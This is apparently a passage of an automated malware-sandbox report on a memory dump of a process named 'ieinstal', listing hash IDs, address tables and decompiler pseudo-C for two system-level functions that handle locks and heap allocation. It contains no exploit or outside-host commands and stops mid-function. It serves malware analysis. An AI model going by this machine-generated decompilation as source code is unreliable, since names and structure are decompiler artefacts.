                                                            0x1ec74413
                                                            0x00000000
                                                            0x1ec741d4
                                                            0x00000000
                                                            0x1ec741c3
                                                            0x1ec741bd
                                                            0x1ec74415
                                                            0x1ec74415
                                                            0x1ec74416
                                                            0x1ec74417
                                                            0x1ec74429
                                                            0x1ec7416e
                                                            0x1ec7416e
                                                            0x1ec74175
                                                            0x1ec74498
                                                            0x1ec7449f
                                                            0x1ecbe12d
                                                            0x00000000
                                                            0x1ecbe133
                                                            0x00000000
                                                            0x1ecbe133
                                                            0x1ec744a5
                                                            0x1ec744a5
                                                            0x1ec744aa
                                                            0x00000000
                                                            0x1ec744bb
                                                            0x1ec744ca
                                                            0x1ec744d6
                                                            0x1ec744d7
                                                            0x1ec744d8
                                                            0x1ec744e3
                                                            0x1ec744e3
                                                            0x1ec744aa
                                                            0x1ec7417b
                                                            0x1ec7417b
                                                            0x1ec7417b
                                                            0x00000000
                                                            0x1ec7417b
                                                            0x1ec74175
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 88190e035f1823d7a8b30e9ca79ba59538b0812da9aaff2d873883e9ed658ab1
                                                            • Instruction ID: 7f647b842c617d3f66c26419617033f31b8f153cca2bf60743ec44560adda886
                                                            • Opcode Fuzzy Hash: 88190e035f1823d7a8b30e9ca79ba59538b0812da9aaff2d873883e9ed658ab1
                                                            • Instruction Fuzzy Hash: 8DF17D75A182518FC714CF1AC890A2AF7E2FF88744F154A2EF886CB354E734D891DB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC820A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 92%
                                                            			E1EC820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1ed48714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E1EC82EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E1EC82EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E1EC558EC(_t240);
									_t221 =  *0x1ed45cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1ed45cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E1EC94A2C(0x1ed46e40, 0x1ec94b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E1EC77D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1ec35c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E1EC8F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E1EC8F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E1ECD7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L1EC72400(_t267 + 0x20);
															}
															L1EC72400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E1EC82397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E1EC72280(_t134, 0x1ed48608);
									__eflags =  *0x1ed46e48 - _t253; // 0x2ead370
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E1EC6FFB0(_t198, _t241, 0x1ed48608);
										__eflags = _t253;
										if(_t253 != 0) {
											L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1ed46e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1ed48608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E1EC86B90(_t210,  &_v64);
										_t262 =  *0x1ed48608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E1EC8E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E1EC997C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E1EC9006A(0x1ed48608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1ed48608);
												E1EC9B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1ed46904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1ed46e48; // 0x2ead370
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E1EC6FFB0(_t198, _t240, 0x1ed48608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E1EC900C2(0x1ed48608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                            0x1ec820a0
                                                            0x1ec820a8
                                                            0x1ec820ad
                                                            0x1ec820b3
                                                            0x1ec820b8
                                                            0x1ec820c2
                                                            0x1ec820c7
                                                            0x1ec820cb
                                                            0x1ec820d2
                                                            0x1ec82263
                                                            0x1ec82266
                                                            0x1ecc5836
                                                            0x1ecc5836
                                                            0x00000000
                                                            0x1ec8226c
                                                            0x1ec8226c
                                                            0x1ec82270
                                                            0x1ec82274
                                                            0x1ec820e2
                                                            0x1ec820e2
                                                            0x1ec820e6
                                                            0x1ec820ee
                                                            0x1ecc57dc
                                                            0x1ecc57de
                                                            0x1ecc57ec
                                                            0x1ecc57ec
                                                            0x1ecc57f1
                                                            0x1ecc57f3
                                                            0x1ecc57f8
                                                            0x00000000
                                                            0x1ecc57f8
                                                            0x1ecc57e0
                                                            0x1ecc57e4
                                                            0x1ecc57ea
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc57ea
                                                            0x1ec820f4
                                                            0x1ec820f4
                                                            0x1ec820f8
                                                            0x1ec820f8
                                                            0x1ec820fc
                                                            0x1ec82100
                                                            0x1ec82106
                                                            0x1ec82201
                                                            0x1ec82206
                                                            0x1ec8220b
                                                            0x1ec8220e
                                                            0x1ec822a9
                                                            0x1ec822ac
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec822b2
                                                            0x1ec822b5
                                                            0x1ecc5801
                                                            0x1ecc5806
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5810
                                                            0x1ecc5815
                                                            0x1ecc5818
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc581e
                                                            0x1ec822bb
                                                            0x1ec822bb
                                                            0x1ec82218
                                                            0x1ec82218
                                                            0x1ec8221c
                                                            0x1ec82220
                                                            0x1ec82222
                                                            0x1ec822c2
                                                            0x1ec822c4
                                                            0x1ec822dc
                                                            0x1ec822dc
                                                            0x1ec822e1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec822e7
                                                            0x1ec822c8
                                                            0x1ec822cd
                                                            0x1ec822d3
                                                            0x1ec822d6
                                                            0x1ecc5823
                                                            0x1ecc5825
                                                            0x1ecc5827
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc582d
                                                            0x00000000
                                                            0x1ecc582d
                                                            0x00000000
                                                            0x1ec82228
                                                            0x1ec82228
                                                            0x00000000
                                                            0x1ec82228
                                                            0x1ec82222
                                                            0x1ec82214
                                                            0x1ec82214
                                                            0x00000000
                                                            0x1ec82114
                                                            0x1ec82114
                                                            0x1ec82114
                                                            0x1ec8211a
                                                            0x1ec8211c
                                                            0x1ec82348
                                                            0x1ec8234d
                                                            0x1ecc5840
                                                            0x1ecc5845
                                                            0x1ecc5848
                                                            0x1ecc584e
                                                            0x1ecc584e
                                                            0x1ecc5848
                                                            0x1ec82353
                                                            0x1ec82355
                                                            0x1ec82388
                                                            0x1ec82388
                                                            0x1ec82368
                                                            0x1ec8236a
                                                            0x1ec8236c
                                                            0x1ec8238f
                                                            0x00000000
                                                            0x1ec8236e
                                                            0x1ec8236e
                                                            0x1ec8218e
                                                            0x1ec8218e
                                                            0x1ec82191
                                                            0x1ec82195
                                                            0x1ecc5a03
                                                            0x1ecc5a06
                                                            0x1ecc5a0c
                                                            0x1ecc5a0f
                                                            0x1ecc5a11
                                                            0x1ecc5a13
                                                            0x1ecc5a13
                                                            0x1ecc5a19
                                                            0x1ecc5a1f
                                                            0x00000000
                                                            0x1ec8219b
                                                            0x1ec8219b
                                                            0x1ec821a0
                                                            0x1ec82282
                                                            0x1ec82284
                                                            0x1ec82284
                                                            0x1ec82284
                                                            0x1ec82284
                                                            0x1ec821a6
                                                            0x1ec821a9
                                                            0x1ec821ac
                                                            0x1ec821ae
                                                            0x1ec821b3
                                                            0x1ec8228b
                                                            0x1ec82290
                                                            0x1ec82379
                                                            0x1ec82296
                                                            0x1ec82298
                                                            0x1ec82298
                                                            0x1ec82290
                                                            0x1ec821b9
                                                            0x1ec821be
                                                            0x1ec822a2
                                                            0x1ec822a2
                                                            0x1ec821c4
                                                            0x1ec821c8
                                                            0x1ec821cc
                                                            0x1ec821d0
                                                            0x1ec821d4
                                                            0x1ec821de
                                                            0x1ec821e3
                                                            0x1ecc5a29
                                                            0x1ecc5a2c
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5a3b
                                                            0x00000000
                                                            0x1ec821e9
                                                            0x1ec821e9
                                                            0x1ec821e9
                                                            0x1ec821ee
                                                            0x1ec821f1
                                                            0x1ecc5a45
                                                            0x1ecc5a4b
                                                            0x1ecc5a52
                                                            0x1ecc5a58
                                                            0x1ecc5a5d
                                                            0x1ecc5a5f
                                                            0x1ecc5a71
                                                            0x1ecc5a61
                                                            0x1ecc5a6a
                                                            0x1ecc5a6a
                                                            0x1ecc5a76
                                                            0x1ecc5a79
                                                            0x1ecc5a7f
                                                            0x1ecc5a83
                                                            0x1ecc5a85
                                                            0x1ecc5a87
                                                            0x1ecc5a87
                                                            0x1ecc5a8c
                                                            0x1ecc5a91
                                                            0x1ecc5a97
                                                            0x1ecc5a9f
                                                            0x1ecc5aa0
                                                            0x1ecc5aa1
                                                            0x1ecc5aa6
                                                            0x1ecc5aab
                                                            0x1ecc5ab1
                                                            0x1ecc5ab3
                                                            0x1ecc5ab9
                                                            0x1ecc5aca
                                                            0x1ecc5ad4
                                                            0x1ecc5ad4
                                                            0x1ecc5ade
                                                            0x1ecc5ade
                                                            0x1ecc5aab
                                                            0x1ecc5a79
                                                            0x1ecc5a52
                                                            0x1ec821f7
                                                            0x1ec821f9
                                                            0x1ec821fe
                                                            0x1ec821fe
                                                            0x1ec821e3
                                                            0x1ec82195
                                                            0x1ec8236c
                                                            0x1ec82122
                                                            0x1ec82122
                                                            0x1ec82124
                                                            0x1ec82231
                                                            0x1ec82236
                                                            0x1ec82236
                                                            0x1ec82238
                                                            0x1ec82238
                                                            0x1ec82240
                                                            0x1ec82242
                                                            0x1ec82244
                                                            0x1ecc59fc
                                                            0x1ec8218c
                                                            0x1ec8218c
                                                            0x00000000
                                                            0x1ec8218c
                                                            0x1ec8224a
                                                            0x1ec8224f
                                                            0x1ec82256
                                                            0x1ec82304
                                                            0x1ec82309
                                                            0x1ec8230f
                                                            0x1ec8231e
                                                            0x1ec8231e
                                                            0x1ec8231e
                                                            0x1ec82320
                                                            0x1ec82325
                                                            0x1ec8232a
                                                            0x1ec8232c
                                                            0x1ec8233e
                                                            0x1ec8233e
                                                            0x00000000
                                                            0x1ec8232c
                                                            0x1ec82311
                                                            0x1ec82317
                                                            0x1ec8231a
                                                            0x1ec8231c
                                                            0x1ec82380
                                                            0x1ec82380
                                                            0x1ec82380
                                                            0x1ec82384
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec82386
                                                            0x00000000
                                                            0x1ec8231c
                                                            0x1ec8225c
                                                            0x1ec8225c
                                                            0x00000000
                                                            0x1ec8225c
                                                            0x1ec8212a
                                                            0x1ec82134
                                                            0x1ec82138
                                                            0x1ec8213d
                                                            0x1ecc5858
                                                            0x1ecc5863
                                                            0x1ecc5863
                                                            0x1ecc5867
                                                            0x1ecc586a
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc586c
                                                            0x1ecc586c
                                                            0x1ecc5871
                                                            0x1ecc5875
                                                            0x1ecc5877
                                                            0x1ecc5997
                                                            0x1ecc599c
                                                            0x1ecc59a1
                                                            0x1ecc59a7
                                                            0x1ecc59a7
                                                            0x00000000
                                                            0x1ecc59a7
                                                            0x1ecc587d
                                                            0x00000000
                                                            0x1ecc588b
                                                            0x1ecc588b
                                                            0x1ecc5890
                                                            0x1ecc5892
                                                            0x1ecc5894
                                                            0x1ecc5899
                                                            0x1ecc589b
                                                            0x1ecc58a0
                                                            0x1ecc58a0
                                                            0x1ecc58aa
                                                            0x1ecc58b2
                                                            0x1ecc58b6
                                                            0x1ecc58be
                                                            0x1ecc58c6
                                                            0x1ecc58c9
                                                            0x1ecc590d
                                                            0x1ecc5917
                                                            0x1ecc591a
                                                            0x1ecc591c
                                                            0x1ecc5920
                                                            0x1ecc5928
                                                            0x1ecc592a
                                                            0x1ecc592c
                                                            0x1ecc592e
                                                            0x1ecc592e
                                                            0x1ecc58cb
                                                            0x1ecc58cd
                                                            0x1ecc58d8
                                                            0x1ecc58e0
                                                            0x1ecc58f4
                                                            0x1ecc58fe
                                                            0x1ecc58fe
                                                            0x1ecc593a
                                                            0x1ecc593e
                                                            0x1ecc5940
                                                            0x1ecc5942
                                                            0x00000000
                                                            0x1ecc5944
                                                            0x1ecc5944
                                                            0x1ecc5949
                                                            0x1ecc594e
                                                            0x1ecc594e
                                                            0x1ecc5953
                                                            0x1ecc595b
                                                            0x1ecc5976
                                                            0x1ecc5976
                                                            0x1ecc597a
                                                            0x1ecc597f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5981
                                                            0x1ecc5981
                                                            0x1ecc5981
                                                            0x1ecc5983
                                                            0x1ecc5988
                                                            0x1ecc598d
                                                            0x1ecc5991
                                                            0x1ecc5991
                                                            0x00000000
                                                            0x1ecc595d
                                                            0x1ecc595d
                                                            0x1ecc5963
                                                            0x1ecc5965
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5967
                                                            0x1ecc5967
                                                            0x1ecc596b
                                                            0x1ecc596d
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc596f
                                                            0x1ecc5971
                                                            0x1ecc5971
                                                            0x1ecc5974
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc5974
                                                            0x00000000
                                                            0x1ecc5967
                                                            0x1ecc595b
                                                            0x1ecc5942
                                                            0x1ecc5863
                                                            0x1ec82143
                                                            0x1ec82143
                                                            0x1ec82149
                                                            0x1ec8214f
                                                            0x1ec822f1
                                                            0x1ec822f6
                                                            0x00000000
                                                            0x1ec82173
                                                            0x1ec82173
                                                            0x1ec8217d
                                                            0x1ec82181
                                                            0x1ec82186
                                                            0x1ecc59ae
                                                            0x1ecc59b2
                                                            0x1ecc59b5
                                                            0x1ecc59b7
                                                            0x1ecc59ba
                                                            0x1ecc59cd
                                                            0x1ecc59d1
                                                            0x1ecc59d5
                                                            0x1ecc59d9
                                                            0x1ecc59db
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecc59dd
                                                            0x1ecc59dd
                                                            0x1ecc59e1
                                                            0x1ecc59e4
                                                            0x1ecc59e7
                                                            0x1ecc59ee
                                                            0x1ecc59ee
                                                            0x1ecc59f3
                                                            0x1ecc59f3
                                                            0x00000000
                                                            0x1ec82186
                                                            0x1ec8214f
                                                            0x1ec82106
                                                            0x1ec82266
                                                            0x1ec820d8
                                                            0x1ec820da
                                                            0x1ec820e0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e21fa37504cb1bada17129959fe9cc409bc608958551f7f3c0b61eecaf7a6709
                                                            • Instruction ID: eae359ec8461910272484ad327510a61e312b87049e78f91bc788f01fbfe6911
                                                            • Opcode Fuzzy Hash: e21fa37504cb1bada17129959fe9cc409bc608958551f7f3c0b61eecaf7a6709
                                                            • Instruction Fuzzy Hash: DDF10336A083829FD319CF25CD54B5A77E3AF95B28F148B1DF8959B288D734D841CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC6D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E1EC6D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1ed4d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E1EC66600(0x1ed452d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1ed47b9c; // 0x0
							_t281 = L1EC74620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E1EC9F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
